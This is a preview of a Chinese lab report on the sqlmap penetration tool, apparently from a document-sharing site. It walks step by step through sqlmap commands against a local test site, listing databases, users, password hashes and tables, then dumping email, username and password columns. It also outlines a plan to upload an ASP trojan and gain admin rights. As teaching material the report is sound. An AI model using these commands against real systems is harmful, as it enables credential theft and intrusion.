实验三-渗透攻击工具SQLMap_第1页
实验三-渗透攻击工具SQLMap_第2页
实验三-渗透攻击工具SQLMap_第3页
实验三-渗透攻击工具SQLMap_第4页
实验三-渗透攻击工具SQLMap_第5页
已阅读5页,还剩8页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、麟 継 笔 记实验三 渗透攻击工具测试 (SQLMap)一、注入简介SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查

2、看S日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,日前支持的数据库是MS-SQL,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。sqlmap的功能强大到让你

3、惊叹,常规注入工具不能绕过的话,终极使用sqlmap会有意想不到的效果。二、实验简介测试环境:本地搭建的具有sql注入点的网站 50注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。总体思路:·发现SQL注入位置;·判断后台数据库类型;·确定XP_CMDSHELL可执行情况·发现WEB虚拟目录·上传ASP木马;·得到管理员权限;三、测试(一)检测注入点是否可用plain view plain copy1

4、. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134"参数:-u:指定注入点url结果:注入结果展示:(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。(2)web服务器系统为windows 2003 or XP(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0(4)数据库类型为:

5、SQLSERVER 2000其中图一有若干询问语句,需要用户输入Y/N,如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -batch  (二)暴库一条命令即可曝出该sqlserver中所有数据库名称,命令如下:plain view plain&

6、#160;copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -dbs  参数:-dbs:dbs前面有两条杠,请看清楚。结果:结果显示该sqlserver中共包含7个可用的数据库。(三)web当前使用的数据库plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u &quo

7、t;50/products.asp?id=134" -current-db  (四)web数据库使用账户plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -current-user  (五)列出sqlserver所有用户plain view plain&

8、#160;copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -users  (六)数据库账户与密码plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -

9、passwords  (七)列出数据库中的表plain view plain copy1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -D tourdata -tables  参数:-D:指定数据库名称-tables:列出表结果:结果体现共列出了34张表。(八)列出表中字段plain view plain copy1

10、. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -D tourdata -T userb -columns  参数:-D:指定数据库名称-T:指定要列出字段的表-columns:指定列出字段结果:结果显示该userb表中包含了23条字段。(九)暴字段内容plain view plain copy1. C:Python27sqlmap>

11、;python sqlmap.py -u "50/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" -dump  参数:-C :指定要暴的字段-dump:将结果导出结果:如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:plain view plain co

12、py1. C:Python27sqlmap>python sqlmap.py -u "50/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" -start 1 -stop 10 -dump  参数:-start:指定开始的行-stop:指定结束的行此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。结果如下:(十)验证结

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论